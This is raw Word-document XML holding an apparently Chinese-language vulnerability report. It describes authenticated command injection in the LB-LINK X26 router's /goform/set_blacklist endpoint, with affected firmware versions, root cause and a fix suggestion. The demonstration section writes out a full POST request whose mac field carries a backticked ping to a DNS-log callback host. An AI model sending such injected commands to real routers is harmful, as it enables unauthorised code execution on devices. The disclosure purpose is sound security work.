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36323" w:rsidRDefault="00537098" w:rsidP="0069798D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00537098">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>LB-LINK X26路由器</w:t>
      </w:r>
      <w:r w:rsidR="00A83A29">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00537098">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>goform</w:t>
      </w:r>
      <w:r w:rsidR="00A83A29">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00537098">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="004032DB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>et_blacklist</w:t>
      </w:r>
      <w:r w:rsidRPr="00537098">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>存在命令</w:t>
      </w:r>
      <w:r w:rsidR="00B271D9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00537098">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w: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一、漏洞介绍</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="00523F0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必联LB-LINK</w:t>
      </w:r>
      <w:r w:rsidR="00737BAF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> X26路由器存在</w:t>
      </w:r>
      <w:r w:rsidR="0034497B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidR="00003E83">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidR="00737BAF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>漏洞，</w:t>
      </w:r>
      <w:r w:rsidR="00ED5BAC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>后台登录后，可以直接执行任意代码，危害极大</w:t>
      </w:r>
      <w:r w:rsidR="00737BAF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="002C5444">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs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二、影响版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="0067742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LB-LINK x26 固件版本 &lt;= 1.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="002C5444">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"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三、漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F7887" w:rsidRDefault="001F7887" w:rsidP="00BC0965">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A22A3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>版本证明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F47CC" w:rsidRDefault="003245B4" w:rsidP="00BC0965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FBD795A" wp14:editId="34189184">
            <wp:extent cx="3452446" cy="1766126"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="443946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6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9558" cy="17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BD" w:rsidRDefault="00983857" w:rsidP="00BC0965">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0098385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3130062" cy="4175426"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="63078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912" cy="418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A7C" w:rsidRDefault="00EE3AEE" w:rsidP="00BC0965">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541676">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>漏洞演示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EE3AEE" w:rsidRDefault="00541676" w:rsidP="00BC09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（具体的可以看视频）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="003E2DF6">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="363" w:firstLineChars="0" w:hanging="36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构造POST请求包：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POST /goform/set_blacklist HTTP/1.1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Host: 192.168.16.1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Content-Length: 58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X-Requested-With: XMLHttpRequest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Accept-Language: zh-CN,zh;q=0.9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Accept: application/json, text/javascript, */*; q=0.01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Content-Type: application/x-www-form-urlencoded; charset=UTF-8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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36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Origin: http://192.168.16.1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Referer: http://192.168.16.1/admin/urlBlack.html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Accept-Encoding: gzip, deflate, br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Cookie: platform=0; user=admin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Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF5FD8" w:rsidRPr="00DF5FD8" w:rsidRDefault="00DF5FD8" w:rsidP="00DF5FD8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</w:p>
    <w:p w:rsidR="00C63A3F" w:rsidRDefault="00DF5FD8" w:rsidP="00DF5FD8">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF5FD8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>type=setmacblack&amp;mac=123.123.123.123;`ping -c 1 poc.jnv9dw9n.eyes.sh`;#&amp;enable=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008564AD" w:rsidRDefault="008564AD" w:rsidP="00DF5FD8">
      <w:pPr>
        <w:pStyle w:val="a9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:rsidR="00EB1167" w:rsidRPr="00EB1167" w:rsidRDefault="00EB1167" w:rsidP="00EB1167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</w:p>
    <w:p w:rsidR="00EB1167" w:rsidRDefault="00C11940">
      <w:pPr>
        <w:pStyle w:val="a9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使用dnslog验证:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="00CA5FA2" w:rsidP="00266DD8">
      <w:pPr>
        <w:pStyle w:val="a9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A8C38B3" wp14:editId="3774A30D">
            <wp:extent cx="5274310" cy="2799715"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="17686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8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40" w:rsidRDefault="00C11940" w:rsidP="00266DD8">
      <w:pPr>
        <w:pStyle w:val="a9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:rsidR="002C5444" w:rsidRDefault="001F7F4D">
      <w:pPr>
        <w:pStyle w:val="a9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Dnslog收到请求</w:t>
      </w:r>
      <w:r w:rsidR="005200AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005200AA" w:rsidRPr="00E11BDC" w:rsidRDefault="00985EF1" w:rsidP="00E11BDC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6557990" wp14:editId="37324547">
            <wp:extent cx="5274310" cy="1755775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="949416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16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4" w:rsidRDefault="002C5444">
      <w:pPr>
        <w:pStyle w:val="a9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:rsidR="002C5444" w:rsidRDefault="002C5444">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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四、触发原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4ABF" w:rsidRDefault="00DA08B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA08B7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ibshare-0.0.26.so的bs_Set</w:t>
      </w:r>
      <w:r w:rsidR="000C023D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MacBlack</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA08B7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16B83" w:rsidRDefault="00F16B83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6AC30287" wp14:editId="3835520D">
            <wp:extent cx="5274310" cy="2640965"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="2096457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57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AD" w:rsidRDefault="00F24E91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E657417" wp14:editId="17EEA312">
            <wp:extent cx="5274310" cy="2954655"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2104023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2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C8" w:rsidRDefault="00E7277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从请求参数中取了</w:t>
      </w:r>
      <w:r w:rsidR="002B338C" w:rsidRPr="002B338C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>参数，通过拼接，最后用</w:t>
      </w:r>
      <w:r w:rsidR="00C823C9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bl_do_system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>执行，未进行任何过滤，导致可以进行命令注入</w:t>
      </w:r>
      <w:r w:rsidR="001D7BE3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00C823C9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这里选择用反引号包裹，直接执行成功。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594FC8" w:rsidRDefault="00594FC8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="002C5444">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"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五、修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="00196D9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对用户的输入严加过滤</w:t>
      </w:r>
      <w:r w:rsidR="0061646D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，防止不安全的输入</w:t>
      </w:r>
      <w:r w:rsidR="00E6670B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>！</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002C5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1184E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B2118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476025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lkOGQ2NjJiMDJkNWMwNmQzOTFmZjRmMjdhOTliYjMifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00B10677"/>
    <w:rsid w:val="00003E83"/>
    <w:rsid w:val="000214AE"/>
    <w:rsid w:val="00024315"/>
    <w:rsid w:val="00045439"/>
    <w:rsid w:val="00053388"/>
    <w:rsid w:val="00054AA9"/>
    <w:rsid w:val="0005608D"/>
    <w:rsid w:val="00087178"/>
    <w:rsid w:val="000A1545"/>
    <w:rsid w:val="000C023D"/>
    <w:rsid w:val="00102F1E"/>
    <w:rsid w:val="00136323"/>
    <w:rsid w:val="00152EA0"/>
    <w:rsid w:val="00157A5C"/>
    <w:rsid w:val="001754CC"/>
    <w:rsid w:val="001778FB"/>
    <w:rsid w:val="00184E8C"/>
    <w:rsid w:val="0018616F"/>
    <w:rsid w:val="00196D9C"/>
    <w:rsid w:val="001A28BD"/>
    <w:rsid w:val="001B6558"/>
    <w:rsid w:val="001D1370"/>
    <w:rsid w:val="001D7BE3"/>
    <w:rsid w:val="001F7887"/>
    <w:rsid w:val="001F7F4D"/>
    <w:rsid w:val="00200B31"/>
    <w:rsid w:val="00202A79"/>
    <w:rsid w:val="002103FE"/>
    <w:rsid w:val="00212FA4"/>
    <w:rsid w:val="00213742"/>
    <w:rsid w:val="002422E7"/>
    <w:rsid w:val="00247FA6"/>
    <w:rsid w:val="00265157"/>
    <w:rsid w:val="00265C67"/>
    <w:rsid w:val="00266DD8"/>
    <w:rsid w:val="00273B36"/>
    <w:rsid w:val="00274B4B"/>
    <w:rsid w:val="002777CC"/>
    <w:rsid w:val="002A22A3"/>
    <w:rsid w:val="002A32EC"/>
    <w:rsid w:val="002A7888"/>
    <w:rsid w:val="002B338C"/>
    <w:rsid w:val="002C5444"/>
    <w:rsid w:val="002D5404"/>
    <w:rsid w:val="002E03DA"/>
    <w:rsid w:val="00303FF3"/>
    <w:rsid w:val="00322F87"/>
    <w:rsid w:val="003245B4"/>
    <w:rsid w:val="00332223"/>
    <w:rsid w:val="00341B5B"/>
    <w:rsid w:val="0034497B"/>
    <w:rsid w:val="003855B6"/>
    <w:rsid w:val="00390D02"/>
    <w:rsid w:val="003A29FB"/>
    <w:rsid w:val="003B3C3F"/>
    <w:rsid w:val="003B460E"/>
    <w:rsid w:val="003C164B"/>
    <w:rsid w:val="003E0CFF"/>
    <w:rsid w:val="003E2DF6"/>
    <w:rsid w:val="003E3BD0"/>
    <w:rsid w:val="003E67CE"/>
    <w:rsid w:val="003E734E"/>
    <w:rsid w:val="0040279B"/>
    <w:rsid w:val="004032DB"/>
    <w:rsid w:val="004257F9"/>
    <w:rsid w:val="0045236F"/>
    <w:rsid w:val="00455762"/>
    <w:rsid w:val="004575AD"/>
    <w:rsid w:val="00457890"/>
    <w:rsid w:val="004679F7"/>
    <w:rsid w:val="0047651E"/>
    <w:rsid w:val="004845F5"/>
    <w:rsid w:val="004908AD"/>
    <w:rsid w:val="00496547"/>
    <w:rsid w:val="004B2303"/>
    <w:rsid w:val="004C0110"/>
    <w:rsid w:val="004D00B4"/>
    <w:rsid w:val="004E1353"/>
    <w:rsid w:val="004E6D84"/>
    <w:rsid w:val="004F592E"/>
    <w:rsid w:val="004F63C6"/>
    <w:rsid w:val="00511FD2"/>
    <w:rsid w:val="00511FDF"/>
    <w:rsid w:val="00514041"/>
    <w:rsid w:val="005200AA"/>
    <w:rsid w:val="00523F0D"/>
    <w:rsid w:val="00526EFE"/>
    <w:rsid w:val="00535A9F"/>
    <w:rsid w:val="00537098"/>
    <w:rsid w:val="00537A67"/>
    <w:rsid w:val="00541676"/>
    <w:rsid w:val="00545E91"/>
    <w:rsid w:val="005622A8"/>
    <w:rsid w:val="00563BC4"/>
    <w:rsid w:val="005813B4"/>
    <w:rsid w:val="00594FC8"/>
    <w:rsid w:val="005A5798"/>
    <w:rsid w:val="005B4FE4"/>
    <w:rsid w:val="005E37B1"/>
    <w:rsid w:val="005E7DBC"/>
    <w:rsid w:val="005F1AC1"/>
    <w:rsid w:val="00612727"/>
    <w:rsid w:val="0061646D"/>
    <w:rsid w:val="00631AA5"/>
    <w:rsid w:val="0063717D"/>
    <w:rsid w:val="00644A7C"/>
    <w:rsid w:val="0064725A"/>
    <w:rsid w:val="006539BB"/>
    <w:rsid w:val="00662AB7"/>
    <w:rsid w:val="006744F8"/>
    <w:rsid w:val="0067742B"/>
    <w:rsid w:val="006945E6"/>
    <w:rsid w:val="0069798D"/>
    <w:rsid w:val="006A379E"/>
    <w:rsid w:val="006A4B32"/>
    <w:rsid w:val="006B4ABF"/>
    <w:rsid w:val="006C34B9"/>
    <w:rsid w:val="006F47CC"/>
    <w:rsid w:val="006F6F4C"/>
    <w:rsid w:val="006F7B74"/>
    <w:rsid w:val="00730899"/>
    <w:rsid w:val="00733898"/>
    <w:rsid w:val="00737BAF"/>
    <w:rsid w:val="00751D32"/>
    <w:rsid w:val="007A0B81"/>
    <w:rsid w:val="007B0BAD"/>
    <w:rsid w:val="007C3E9D"/>
    <w:rsid w:val="008103FF"/>
    <w:rsid w:val="00813686"/>
    <w:rsid w:val="00815D52"/>
    <w:rsid w:val="008269C9"/>
    <w:rsid w:val="008345A2"/>
    <w:rsid w:val="00836F5B"/>
    <w:rsid w:val="0083735C"/>
    <w:rsid w:val="00855631"/>
    <w:rsid w:val="008564AD"/>
    <w:rsid w:val="00860697"/>
    <w:rsid w:val="008643B6"/>
    <w:rsid w:val="00864D8F"/>
    <w:rsid w:val="0086667B"/>
    <w:rsid w:val="00883780"/>
    <w:rsid w:val="008B1897"/>
    <w:rsid w:val="008C02E8"/>
    <w:rsid w:val="008C0EEA"/>
    <w:rsid w:val="008C62C5"/>
    <w:rsid w:val="008E04C6"/>
    <w:rsid w:val="00901CF7"/>
    <w:rsid w:val="00906ABC"/>
    <w:rsid w:val="009146F7"/>
    <w:rsid w:val="0091476E"/>
    <w:rsid w:val="009151CB"/>
    <w:rsid w:val="0091696A"/>
    <w:rsid w:val="00934CAC"/>
    <w:rsid w:val="00941113"/>
    <w:rsid w:val="00955D97"/>
    <w:rsid w:val="00971CA2"/>
    <w:rsid w:val="00983857"/>
    <w:rsid w:val="00985126"/>
    <w:rsid w:val="00985EF1"/>
    <w:rsid w:val="009B24A1"/>
    <w:rsid w:val="009B70B7"/>
    <w:rsid w:val="009C2F89"/>
    <w:rsid w:val="009C31ED"/>
    <w:rsid w:val="009C41D9"/>
    <w:rsid w:val="009C62A0"/>
    <w:rsid w:val="009D1E72"/>
    <w:rsid w:val="009D685F"/>
    <w:rsid w:val="009E1F17"/>
    <w:rsid w:val="009E622B"/>
    <w:rsid w:val="009F3175"/>
    <w:rsid w:val="009F4A94"/>
    <w:rsid w:val="00A0294C"/>
    <w:rsid w:val="00A1155A"/>
    <w:rsid w:val="00A22D3C"/>
    <w:rsid w:val="00A24B67"/>
    <w:rsid w:val="00A413C2"/>
    <w:rsid w:val="00A576F2"/>
    <w:rsid w:val="00A81CA0"/>
    <w:rsid w:val="00A83A29"/>
    <w:rsid w:val="00A85771"/>
    <w:rsid w:val="00A85F3E"/>
    <w:rsid w:val="00A93536"/>
    <w:rsid w:val="00AA2755"/>
    <w:rsid w:val="00AB0348"/>
    <w:rsid w:val="00AB1085"/>
    <w:rsid w:val="00AD37CA"/>
    <w:rsid w:val="00B00B9F"/>
    <w:rsid w:val="00B04F42"/>
    <w:rsid w:val="00B10677"/>
    <w:rsid w:val="00B2403E"/>
    <w:rsid w:val="00B271D9"/>
    <w:rsid w:val="00B308DF"/>
    <w:rsid w:val="00B33161"/>
    <w:rsid w:val="00B33CE8"/>
    <w:rsid w:val="00B42683"/>
    <w:rsid w:val="00B5182D"/>
    <w:rsid w:val="00B57E35"/>
    <w:rsid w:val="00B67204"/>
    <w:rsid w:val="00B73B70"/>
    <w:rsid w:val="00B74F6B"/>
    <w:rsid w:val="00B84277"/>
    <w:rsid w:val="00B90051"/>
    <w:rsid w:val="00B940ED"/>
    <w:rsid w:val="00BA12E4"/>
    <w:rsid w:val="00BA48AA"/>
    <w:rsid w:val="00BC0965"/>
    <w:rsid w:val="00BC0C1F"/>
    <w:rsid w:val="00BD2DD7"/>
    <w:rsid w:val="00BD410B"/>
    <w:rsid w:val="00BD4357"/>
    <w:rsid w:val="00BD4C3C"/>
    <w:rsid w:val="00C0166C"/>
    <w:rsid w:val="00C0620A"/>
    <w:rsid w:val="00C11940"/>
    <w:rsid w:val="00C25268"/>
    <w:rsid w:val="00C304D3"/>
    <w:rsid w:val="00C4500C"/>
    <w:rsid w:val="00C45658"/>
    <w:rsid w:val="00C54A7A"/>
    <w:rsid w:val="00C6169A"/>
    <w:rsid w:val="00C63A3F"/>
    <w:rsid w:val="00C67F99"/>
    <w:rsid w:val="00C800E9"/>
    <w:rsid w:val="00C823C9"/>
    <w:rsid w:val="00C91084"/>
    <w:rsid w:val="00CA14D5"/>
    <w:rsid w:val="00CA5FA2"/>
    <w:rsid w:val="00CC7A82"/>
    <w:rsid w:val="00CE7B3A"/>
    <w:rsid w:val="00D04933"/>
    <w:rsid w:val="00D30811"/>
    <w:rsid w:val="00D32B1E"/>
    <w:rsid w:val="00D43EF5"/>
    <w:rsid w:val="00D447B7"/>
    <w:rsid w:val="00D51C2D"/>
    <w:rsid w:val="00D54937"/>
    <w:rsid w:val="00D54B57"/>
    <w:rsid w:val="00D57146"/>
    <w:rsid w:val="00D63BAF"/>
    <w:rsid w:val="00D8549C"/>
    <w:rsid w:val="00D85BE2"/>
    <w:rsid w:val="00D93BCD"/>
    <w:rsid w:val="00DA08B7"/>
    <w:rsid w:val="00DC188F"/>
    <w:rsid w:val="00DE3C45"/>
    <w:rsid w:val="00DF5FD8"/>
    <w:rsid w:val="00E06F03"/>
    <w:rsid w:val="00E11BDC"/>
    <w:rsid w:val="00E32B41"/>
    <w:rsid w:val="00E4064B"/>
    <w:rsid w:val="00E41399"/>
    <w:rsid w:val="00E4467F"/>
    <w:rsid w:val="00E60671"/>
    <w:rsid w:val="00E60E26"/>
    <w:rsid w:val="00E64D9A"/>
    <w:rsid w:val="00E6670B"/>
    <w:rsid w:val="00E72774"/>
    <w:rsid w:val="00E8168C"/>
    <w:rsid w:val="00E8250D"/>
    <w:rsid w:val="00E97B9F"/>
    <w:rsid w:val="00EA5BBE"/>
    <w:rsid w:val="00EA6212"/>
    <w:rsid w:val="00EB1167"/>
    <w:rsid w:val="00EC306D"/>
    <w:rsid w:val="00ED19EF"/>
    <w:rsid w:val="00ED4E73"/>
    <w:rsid w:val="00ED5BAC"/>
    <w:rsid w:val="00EE36C3"/>
    <w:rsid w:val="00EE3AEE"/>
    <w:rsid w:val="00EF0182"/>
    <w:rsid w:val="00F012ED"/>
    <w:rsid w:val="00F05C40"/>
    <w:rsid w:val="00F06CC5"/>
    <w:rsid w:val="00F16B83"/>
    <w:rsid w:val="00F24E91"/>
    <w:rsid w:val="00F3189D"/>
    <w:rsid w:val="00F53286"/>
    <w:rsid w:val="00F539AE"/>
    <w:rsid w:val="00F55335"/>
    <w:rsid w:val="00F744DB"/>
    <w:rsid w:val="00F756C5"/>
    <w:rsid w:val="00F77F23"/>
    <w:rsid w:val="00F938B9"/>
    <w:rsid w:val="00F97563"/>
    <w:rsid w:val="00FA0C72"/>
    <w:rsid w:val="00FC6151"/>
    <w:rsid w:val="00FC78EA"/>
    <w:rsid w:val="00FE1E7F"/>
    <w:rsid w:val="00FE3F4D"/>
    <w:rsid w:val="00FF16BA"/>
    <w:rsid w:val="4FB3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5FF21"/>
  <w15:docId w15:val="{38AF0AD4-C5DC-4B27-B5ED-88818053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a">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B460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51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pentester</cp:lastModifiedBy>
  <cp:revision>135</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-16T10:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-14T02:54:00Z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C3E453BFF82743E2AB55616DFA624C6F_12</vt:lpwstr>
  </property>
</Properties>
</file>